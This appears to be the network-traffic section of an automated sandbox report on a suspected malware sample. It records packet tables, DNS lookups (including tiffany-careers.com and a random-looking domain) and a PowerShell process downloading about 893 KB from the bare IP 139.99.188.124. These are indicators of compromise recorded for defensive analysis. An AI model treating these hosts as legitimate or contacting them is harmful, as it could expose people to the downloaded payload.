                                                                                                                                                                                                                  Dec 18, 2024 21:07:33.380898952 CET4970480192.168.2.62.20.68.210
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.414755106 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.414896011 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.420002937 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.420011044 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.420810938 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.422173977 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.422334909 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.422342062 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.422369957 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:34.463360071 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:35.086237907 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:35.086745977 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:35.086774111 CET4434998220.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:35.086815119 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:35.086853981 CET49982443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:07:36.626307011 CET4434994323.44.203.84192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:36.626388073 CET4434994323.44.203.84192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:36.626430035 CET49943443192.168.2.623.44.203.84
                                                                                                                                                                                                                  Dec 18, 2024 21:07:59.474558115 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:07:59.474617004 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:59.474690914 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:07:59.475446939 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:07:59.475461960 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.688153028 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.688343048 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.690123081 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.690136909 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.690390110 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.771070957 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.771955967 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.771972895 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.778368950 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:01.819331884 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.435775042 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.436247110 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.436252117 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.436270952 CET50044443192.168.2.620.198.119.143
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.436280012 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.436289072 CET4435004420.198.119.143192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:08:02.436304092 CET50044443192.168.2.620.198.119.143

                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Dec 18, 2024 21:06:00.246495962 CET5059053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:00.385514021 CET53505901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:13.659888983 CET5465553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:13.660047054 CET5390253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.269711971 CET6544553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.270020962 CET6275053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.270435095 CET6272553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.270764112 CET5678153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.298217058 CET6046553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.298556089 CET6468753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.314865112 CET6029853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.315074921 CET5656753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.406610012 CET53654451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.406758070 CET53627501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.407212019 CET53627251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.407545090 CET53567811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.435058117 CET53604651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.435391903 CET53646871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.452119112 CET53602981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.560724974 CET53565671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.451176882 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.452373028 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.765302896 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766254902 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.373646021 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.374061108 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.566996098 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.567379951 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.567747116 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.567783117 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.568403006 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.568440914 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.568891048 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.569039106 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.570328951 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.574961901 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.575000048 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.576421022 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.576936960 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.577124119 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.591175079 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.689888954 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.690109015 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.884522915 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.884555101 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.884584904 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.884722948 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.891628027 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.892294884 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.892303944 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.892333984 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.892363071 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895380974 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895492077 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895818949 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895876884 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.905230045 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.222347021 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.222372055 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.263333082 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.263467073 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.899525881 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.899666071 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.214957952 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.217776060 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.229037046 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.229296923 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.750926971 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.751162052 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.066102028 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.068835974 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.068991899 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.073051929 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.233613014 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.234158039 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.235172987 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.235799074 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.550318003 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.551232100 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.551512003 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.551826000 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.552067041 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.552534103 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.552694082 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.552992105 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:28.292737007 CET6243553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:28.429862022 CET53624351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:48.814301014 CET5753453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:48.952970028 CET53575341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:14.421274900 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:14.421459913 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:14.421722889 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:14.421843052 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.434868097 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.434988976 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.435703039 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.435741901 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.524097919 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.605530977 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.605530977 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.745708942 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.745708942 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.749471903 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.749501944 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.749536037 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.749552011 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.749572039 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.756583929 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.762254953 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.766504049 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.774019003 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.775127888 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.919696093 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.953097105 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.061093092 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.062858105 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.071542025 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.072312117 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.074441910 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.076246023 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.090208054 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.090245008 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.121869087 CET51385443192.168.2.6172.64.41.3

                                                                                                                                                                                                                  ICMP Packets

                                                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.564013958 CET192.168.2.61.1.1.1c24c(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Dec 18, 2024 21:06:00.246495962 CET192.168.2.61.1.1.10xb723Standard query (0)tiffany-careers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:13.659888983 CET192.168.2.61.1.1.10x7238Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:13.660047054 CET192.168.2.61.1.1.10xd900Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.269711971 CET192.168.2.61.1.1.10x83fStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.270020962 CET192.168.2.61.1.1.10xb34eStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.270435095 CET192.168.2.61.1.1.10x9d4cStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.270764112 CET192.168.2.61.1.1.10xf26cStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.298217058 CET192.168.2.61.1.1.10x1960Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.298556089 CET192.168.2.61.1.1.10xefb3Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.314865112 CET192.168.2.61.1.1.10xde4dStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.315074921 CET192.168.2.61.1.1.10x6083Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:28.292737007 CET192.168.2.61.1.1.10xf952Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:48.814301014 CET192.168.2.61.1.1.10x613Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false

                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Dec 18, 2024 21:05:54.737921000 CET1.1.1.1192.168.2.60x11a9No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:05:54.737921000 CET1.1.1.1192.168.2.60x11a9No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:00.385514021 CET1.1.1.1192.168.2.60xb723No error (0)tiffany-careers.com147.45.49.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.487927914 CET1.1.1.1192.168.2.60xe970No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.487927914 CET1.1.1.1192.168.2.60xe970No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.577888012 CET1.1.1.1192.168.2.60x90d1No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:13.797019005 CET1.1.1.1192.168.2.60xd900No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:13.893244028 CET1.1.1.1192.168.2.60x7238No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.406610012 CET1.1.1.1192.168.2.60x83fNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.406610012 CET1.1.1.1192.168.2.60x83fNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.406758070 CET1.1.1.1192.168.2.60xb34eNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.407212019 CET1.1.1.1192.168.2.60x9d4cNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.407212019 CET1.1.1.1192.168.2.60x9d4cNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.407545090 CET1.1.1.1192.168.2.60xf26cNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.435058117 CET1.1.1.1192.168.2.60x1960No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.435058117 CET1.1.1.1192.168.2.60x1960No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.435391903 CET1.1.1.1192.168.2.60xefb3No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.452119112 CET1.1.1.1192.168.2.60xde4dNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.452119112 CET1.1.1.1192.168.2.60xde4dNo error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:15.560724974 CET1.1.1.1192.168.2.60x6083No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:28.429862022 CET1.1.1.1192.168.2.60xf952Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:48.952970028 CET1.1.1.1192.168.2.60x613Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:52.053039074 CET1.1.1.1192.168.2.60xcf37No error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:52.053039074 CET1.1.1.1192.168.2.60xcf37No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:06:52.053039074 CET1.1.1.1192.168.2.60xcf37No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:07:13.341713905 CET1.1.1.1192.168.2.60xd0b3No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:07:13.341713905 CET1.1.1.1192.168.2.60xd0b3No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:07:14.339647055 CET1.1.1.1192.168.2.60xd0b3No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:07:14.339647055 CET1.1.1.1192.168.2.60xd0b3No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.346571922 CET1.1.1.1192.168.2.60xd0b3No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.346571922 CET1.1.1.1192.168.2.60xd0b3No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:07:17.354132891 CET1.1.1.1192.168.2.60xd0b3No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:07:17.354132891 CET1.1.1.1192.168.2.60xd0b3No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:07:21.407203913 CET1.1.1.1192.168.2.60xd0b3No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Dec 18, 2024 21:07:21.407203913 CET1.1.1.1192.168.2.60xd0b3No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                  • tiffany-careers.com
                                                                                                                                                                                                                  • tse1.mm.bing.net
                                                                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                                                                  • 139.99.188.124

                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  0192.168.2.649776139.99.188.124805612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Dec 18, 2024 21:06:16.339706898 CET164OUTGET /kiiMf HTTP/1.1
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                  Host: 139.99.188.124
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.835608959 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:17 GMT
                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                  Last-Modified: Sun, 15 Dec 2024 10:29:42 GMT
                                                                                                                                                                                                                  ETag: "da2a8-6294c8abc9816"
                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                  Content-Length: 893608
                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                  Connection: Keep-Alive
